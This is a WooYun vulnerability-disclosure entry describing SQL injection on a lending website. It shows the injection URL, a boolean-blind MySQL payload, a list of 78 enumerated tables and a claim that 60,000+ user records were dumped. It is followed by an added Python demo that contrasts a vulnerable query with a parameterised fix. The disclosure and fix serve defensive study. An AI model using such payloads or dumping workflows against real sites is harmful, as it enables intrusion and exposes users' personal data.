WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles, online reader: http://drop.zone.ci/
2015-08-17: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-10-01: The vendor has actively ignored the vulnerability; details disclosed to the public.
test
The main site of Rongbei (融贝网), https://**.**.**.**/, has a SQL injection vulnerability. Through it, the records of more than 60,000 users can be obtained.
Injection point: https://**.**.**.**/index/plist?type=0&status=0&income=0&condition=close&payment=0&cycle=0
Parameter: type (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: type=(SELECT (CASE WHEN (5430=5430) THEN 5430 ELSE 5430*(SELECT 5430 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&status=0&income=0&condition=close&payment=0&cycle=0
The injection was used to enumerate the databases.
The current database is vvt.
The vvt database contains 78 tables.
[78 tables]
+---------------------------+
| vvt_admin_funcs           |
| vvt_admin_role_funcs      |
| vvt_admin_roles           |
| vvt_admin_user            |
| vvt_areas                 |
| vvt_assign                |
| vvt_assign_audit          |
| vvt_bankinfo              |
| vvt_banks                 |
| vvt_banks_branch          |
| vvt_banner                |
| vvt_cautioner             |
| vvt_cautioner_property    |
| vvt_charge                |
| vvt_charge_company        |
| vvt_check_user_account    |
| vvt_checkmobile           |
| vvt_chinapnr_bankinfo     |
| vvt_cms_category          |
| vvt_company               |
| vvt_company_loan          |
| vvt_company_property      |
| vvt_crontab               |
| vvt_csai_push             |
| vvt_discharge             |
| vvt_discharge_company     |
| vvt_flink_partner         |
| vvt_illegalusername       |
| vvt_income                |
| vvt_invest                |
| vvt_invitation            |
| vvt_invite_reward         |
| vvt_log                   |
| vvt_message               |
| vvt_messagesend           |
| vvt_move_statistics       |
| vvt_newcms                |
| vvt_payment               |
| vvt_payment_copy          |
| vvt_personal_approveinfo  |
| vvt_personal_property     |
| vvt_petition              |
| vvt_platform              |
| vvt_project               |
| vvt_project_copy          |
| vvt_project_othergain     |
| vvt_project_pregain       |
| vvt_project_property      |
| vvt_project_schedule      |
| vvt_project_schedule_copy |
| vvt_promote_summary       |
| vvt_property              |
| vvt_question              |
| vvt_repayment             |
| vvt_repayment_copy        |
| vvt_reviewsinfo           |
| vvt_role                  |
| vvt_spread_award          |
| vvt_spread_duanwu         |
| vvt_spread_times          |
| vvt_survey_options        |
| vvt_survey_questions      |
| vvt_sys_company_pay       |
| vvt_sys_profit            |
| vvt_user                  |
| vvt_user_cash             |
| vvt_user_gain             |
| vvt_user_gain_copy        |
| vvt_user_log              |
| vvt_user_money_log        |
| vvt_user_property         |
| vvt_user_property_copy    |
| vvt_user_rebate           |
| vvt_user_repayment        |
| vvt_user_reward           |
| vvt_user_service_log      |
| vvt_user_suggestion       |
| vvt_user_survey_log       |
+---------------------------+
The vvt_user table was dumped; it holds more than 60,000 user records.
Dumping was rather slow, so only a few rows were pulled to verify.
Fix suggestion: apply proper input filtering.
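The report's injection is a "parameter replace" probe: the numeric type parameter is swapped for a whole SQL expression, and the server evaluates it because the value is spliced into the query text. The following is an added example, not code from the report or from the site; the table vvt_project and its columns are assumed, and the probe strings are constructed to fit sqlite (which has no INFORMATION_SCHEMA). It shows the vulnerable pattern beside a hardened handler that validates the parameter as an integer and binds it instead of concatenating it.

```python
import sqlite3

# Constructed stand-in for the site's database. The table and its columns are
# assumed for the demo; they are not taken from the report.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vvt_project (id INTEGER, type INTEGER, status INTEGER)")
    conn.executemany("INSERT INTO vvt_project VALUES (?, ?, ?)",
                     [(1, 0, 0), (2, 0, 0), (3, 1, 0)])
    return conn

def plist_vulnerable(conn, type_param, status_param):
    # The pattern the report implies: GET parameters pasted straight into the
    # SQL text, so the database evaluates whatever expression the client sends.
    sql = (f"SELECT id FROM vvt_project WHERE type={type_param} "
           f"AND status={status_param} ORDER BY id")
    return [row[0] for row in conn.execute(sql)]

def plist_fixed(conn, type_param, status_param):
    # Hardened form: numeric parameters must parse as plain integers, and the
    # values are bound as query parameters rather than spliced into the SQL.
    try:
        type_val, status_val = int(type_param), int(status_param)
    except (TypeError, ValueError):
        raise ValueError("type and status must be integers") from None
    sql = "SELECT id FROM vvt_project WHERE type=? AND status=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (type_val, status_val))]

def rejects(conn, type_param):
    # True when the hardened handler refuses the value before any query runs.
    try:
        plist_fixed(conn, type_param, "0")
        return False
    except ValueError:
        return True

# Simplified probes in the style of the report's payload (constructed): the
# expression yields 0 when the condition holds and 1 otherwise, so the row set
# that comes back tells the sender whether the condition was true.
TRUE_PROBE = "(SELECT CASE WHEN (5430=5430) THEN 0 ELSE 1 END)"
FALSE_PROBE = "(SELECT CASE WHEN (5430=5431) THEN 0 ELSE 1 END)"

if __name__ == "__main__":
    db = make_db()
    print(plist_vulnerable(db, TRUE_PROBE, "0"))   # [1, 2]: type=0 rows, condition true
    print(plist_vulnerable(db, FALSE_PROBE, "0"))  # [3]: type=1 rows, condition false
    print(rejects(db, TRUE_PROBE))                 # True: the hardened handler never runs it
```

In a real deployment the rejected request is also the detection signal: log the offending parameter and its source so repeated probes against /index/plist surface in monitoring.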
Severity: no response yet
Vulnerability Rank: 0
Confirmed at: 2015-08-17 22:00
Vendor response: none yet